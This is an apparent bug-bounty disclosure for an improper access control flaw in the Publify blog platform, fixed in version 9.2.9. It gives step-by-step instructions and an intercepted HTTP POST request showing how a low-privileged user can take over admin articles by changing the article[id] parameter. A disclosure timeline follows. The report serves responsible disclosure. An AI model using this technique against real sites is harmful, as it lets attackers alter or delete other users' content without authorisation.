Improper Access Control - Articles in publify/publify


Reported on

May 20th 2022


A low-privileged user can modify and delete admin articles just by changing the value of the article[id] parameter.

Proof of Concept

  • Step 1 - Authenticated as an unprivileged user, create a New article

  • Step 2 - Click Edit article

  • Step 3 - Intercept requests and Save your article

  • Step 4 - In the request that was intercepted, change the value of the article[id] parameter to the ID of admin article (You can get the id by copying the edit link of article)

  • Step 5 - Submit a request and the admin article will be hijacked.

POST /admin/content/5850 HTTP/1.1
Cookie: _publify_blog_session=cookie
Content-Length: 2234
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBydp1QV5GIbVRQBU
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Disposition: form-data; name="article[id]"

Content-Disposition: form-data; name="article[title]"

Content-Disposition: form-data; name="article[body_and_extended]"

Content-Disposition: form-data; name="article[keywords]"



An unprivileged user is allow to modify/delete admin's articles

We are processing your report and will contact the publify team within 24 hours. 2 years ago
We have contacted a member of the publify team and are waiting to hear back 2 years ago
publify/publify maintainer has acknowledged this report 2 years ago
Matijs van Zuijlen validated this vulnerability 2 years ago
ninj4c0d3r has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matijs van Zuijlen marked this as fixed in 9.2.9 with commit c0aba8 2 years ago
Matijs van Zuijlen has been awarded the fix bounty
to join this conversation